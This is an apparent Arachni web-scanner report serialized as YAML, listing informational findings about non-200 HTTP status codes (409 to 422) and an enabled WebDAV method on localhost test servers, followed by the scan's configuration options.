text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Interesting response description: ! 'The server responded with a non 200 (OK) code. 
' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: [] internal_modname: InterestingResponses internal_modname: InterestingResponses - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html var: url: http://localhost:10473/409 elem: server method: GET name: Interesting response description: ! 'The server responded with a non 200 (OK) code. ' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html opts: :id: ! 'Code: 409' :element: server :regexp: '' var: url: http://localhost:10473/409 injected: id: ! 'Code: 409' regexp: '' regexp_match: elem: server remarks: {} method: GET response: '4099705' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Interesting response description: ! 'The server responded with a non 200 (OK) code. 
' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: [] internal_modname: InterestingResponses internal_modname: InterestingResponses - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html var: url: http://localhost:10473/411 elem: server method: GET name: Interesting response description: ! 'The server responded with a non 200 (OK) code. ' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html opts: :id: ! 'Code: 411' :element: server :regexp: '' var: url: http://localhost:10473/411 injected: id: ! 'Code: 411' regexp: '' regexp_match: elem: server remarks: {} method: GET response: '4117224' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Interesting response description: ! 'The server responded with a non 200 (OK) code. 
' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: [] internal_modname: InterestingResponses internal_modname: InterestingResponses - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html var: url: http://localhost:10473/412 elem: server method: GET name: Interesting response description: ! 'The server responded with a non 200 (OK) code. ' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html opts: :id: ! 'Code: 412' :element: server :regexp: '' var: url: http://localhost:10473/412 injected: id: ! 'Code: 412' regexp: '' regexp_match: elem: server remarks: {} method: GET response: '4129364' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Interesting response description: ! 'The server responded with a non 200 (OK) code. 
' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: [] internal_modname: InterestingResponses internal_modname: InterestingResponses - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html var: url: http://localhost:10473/410 elem: server method: GET name: Interesting response description: ! 'The server responded with a non 200 (OK) code. ' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html opts: :id: ! 'Code: 410' :element: server :regexp: '' var: url: http://localhost:10473/410 injected: id: ! 'Code: 410' regexp: '' regexp_match: elem: server remarks: {} method: GET response: '4106967' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Interesting response description: ! 'The server responded with a non 200 (OK) code. 
' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: [] internal_modname: InterestingResponses internal_modname: InterestingResponses - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html var: url: http://localhost:10473/413 elem: server method: GET name: Interesting response description: ! 'The server responded with a non 200 (OK) code. ' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html opts: :id: ! 'Code: 413' :element: server :regexp: '' var: url: http://localhost:10473/413 injected: id: ! 'Code: 413' regexp: '' regexp_match: elem: server remarks: {} method: GET response: '4136305' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Interesting response description: ! 'The server responded with a non 200 (OK) code. 
' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: [] internal_modname: InterestingResponses internal_modname: InterestingResponses - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html var: url: http://localhost:10473/414 elem: server method: GET name: Interesting response description: ! 'The server responded with a non 200 (OK) code. ' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html opts: :id: ! 'Code: 414' :element: server :regexp: '' var: url: http://localhost:10473/414 injected: id: ! 'Code: 414' regexp: '' regexp_match: elem: server remarks: {} method: GET response: '414796' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Interesting response description: ! 'The server responded with a non 200 (OK) code. 
' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: [] internal_modname: InterestingResponses internal_modname: InterestingResponses - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html var: url: http://localhost:10473/415 elem: server method: GET name: Interesting response description: ! 'The server responded with a non 200 (OK) code. ' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html opts: :id: ! 'Code: 415' :element: server :regexp: '' var: url: http://localhost:10473/415 injected: id: ! 'Code: 415' regexp: '' regexp_match: elem: server remarks: {} method: GET response: '4154386' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Interesting response description: ! 'The server responded with a non 200 (OK) code. 
' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: [] internal_modname: InterestingResponses internal_modname: InterestingResponses - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html var: url: http://localhost:10473/416 elem: server method: GET name: Interesting response description: ! 'The server responded with a non 200 (OK) code. ' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html opts: :id: ! 'Code: 416' :element: server :regexp: '' var: url: http://localhost:10473/416 injected: id: ! 'Code: 416' regexp: '' regexp_match: elem: server remarks: {} method: GET response: '4166752' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Interesting response description: ! 'The server responded with a non 200 (OK) code. 
' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: [] internal_modname: InterestingResponses internal_modname: InterestingResponses - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html var: url: http://localhost:10473/417 elem: server method: GET name: Interesting response description: ! 'The server responded with a non 200 (OK) code. ' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html opts: :id: ! 'Code: 417' :element: server :regexp: '' var: url: http://localhost:10473/417 injected: id: ! 'Code: 417' regexp: '' regexp_match: elem: server remarks: {} method: GET response: '4174639' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Interesting response description: ! 'The server responded with a non 200 (OK) code. 
' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: [] internal_modname: InterestingResponses internal_modname: InterestingResponses - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html var: url: http://localhost:10473/418 elem: server method: GET name: Interesting response description: ! 'The server responded with a non 200 (OK) code. ' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html opts: :id: ! 'Code: 418' :element: server :regexp: '' var: url: http://localhost:10473/418 injected: id: ! 'Code: 418' regexp: '' regexp_match: elem: server remarks: {} method: GET response: '4181819' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Interesting response description: ! 'The server responded with a non 200 (OK) code. 
' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: [] internal_modname: InterestingResponses internal_modname: InterestingResponses - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html var: url: http://localhost:10473/420 elem: server method: GET name: Interesting response description: ! 'The server responded with a non 200 (OK) code. ' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html opts: :id: ! 'Code: 420' :element: server :regexp: '' var: url: http://localhost:10473/420 injected: id: ! 'Code: 420' regexp: '' regexp_match: elem: server remarks: {} method: GET response: '4201223' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Interesting response description: ! 'The server responded with a non 200 (OK) code. 
' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: [] internal_modname: InterestingResponses internal_modname: InterestingResponses - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html var: url: http://localhost:10473/422 elem: server method: GET name: Interesting response description: ! 'The server responded with a non 200 (OK) code. ' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: - !ruby/object:Arachni::Issue verification: false references: w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html opts: :id: ! 'Code: 422' :element: server :regexp: '' var: url: http://localhost:10473/422 injected: id: ! 'Code: 422' regexp: '' regexp_match: elem: server remarks: {} method: GET response: '4227446' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Interesting response description: ! 'The server responded with a non 200 (OK) code. 
' tags: - interesting - response - server severity: Informational mod_name: Interesting responses variations: [] internal_modname: InterestingResponses internal_modname: InterestingResponses - !ruby/object:Arachni::Issue verification: false references: WebDAV.org: http://www.webdav.org/specs/rfc4918.html Wikipedia: http://en.wikipedia.org/wiki/WebDAV var: url: http://localhost:12297/ elem: server method: OPTIONS name: WebDAV description: ! "WebDAV is enabled on the server.\n Consider auditing further using a specialised tool." tags: - webdav - options - methods - server severity: Informational remedy_guidance: Disable WebDAV if not required. If it is required, perform an audit using specialized tools. mod_name: WebDAV variations: - !ruby/object:Arachni::Issue verification: false references: WebDAV.org: http://www.webdav.org/specs/rfc4918.html Wikipedia: http://en.wikipedia.org/wiki/WebDAV opts: :element: server :regexp: '' var: url: http://localhost:12297/ injected: id: regexp: '' regexp_match: elem: server remarks: {} method: OPTIONS response: Content-TypeAllow headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "QWxsb3c=": !binary |- U1RVRkYsIFBST1BGSU5E !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NyBHTVQ= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTc= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: WebDAV description: ! "WebDAV is enabled on the server.\n Consider auditing further using a specialised tool." 
tags: - webdav - options - methods - server severity: Informational remedy_guidance: Disable WebDAV if not required. If it is required, perform an audit using specialized tools. mod_name: WebDAV variations: [] internal_modname: WebDav internal_modname: WebDav options: dir: root: /home/zapotek/workspace/arachni/ gfx: /home/zapotek/workspace/arachni/gfx/ conf: /home/zapotek/workspace/arachni/conf/ logs: /home/zapotek/workspace/arachni/logs/ data: /home/zapotek/workspace/arachni/data/ modules: /home/zapotek/workspace/arachni/modules/ reports: /home/zapotek/workspace/arachni/reports/ plugins: /home/zapotek/workspace/arachni/plugins/ rpcd_handlers: /home/zapotek/workspace/arachni/rpcd_handlers/ path_extractors: /home/zapotek/workspace/arachni/path_extractors/ lib: /home/zapotek/workspace/arachni/lib/arachni/ mixins: /home/zapotek/workspace/arachni/lib/arachni/mixins/ arachni: /home/zapotek/workspace/arachni/lib/arachni user_agent: Arachni/v1.0dev http_timeout: 50000 datastore: {} redundant: {} https_only: false obey_robots_txt: false fuzz_methods: false audit_cookies_extensively: false exclude_binaries: false auto_redundant: depth_limit: link_count_limit: redirect_limit: 20 lsmod: [] lsrep: [] http_req_limit: 20 mods: [] reports: {} exclude: [] exclude_body: [] exclude_cookies: [] exclude_vectors: [] include: [] lsplug: [] plugins: {} rpc_instance_port_range: - 1025 - 65535 load_profile: [] restrict_paths: [] extend_paths: [] custom_headers: {} min_pages_per_instance: 30 max_slaves: 10 url: http://test.com/ audit_forms: true audit_links: true audit_cookies: true audit_headers: true start_datetime: !binary |- TW9uIEZlYiAxMSAwODoxOTo1MyAyMDEz finish_datetime: !binary |- TW9uIEZlYiAxMSAwODoxOTo1MyAyMDEz delta_time: '00:00:00'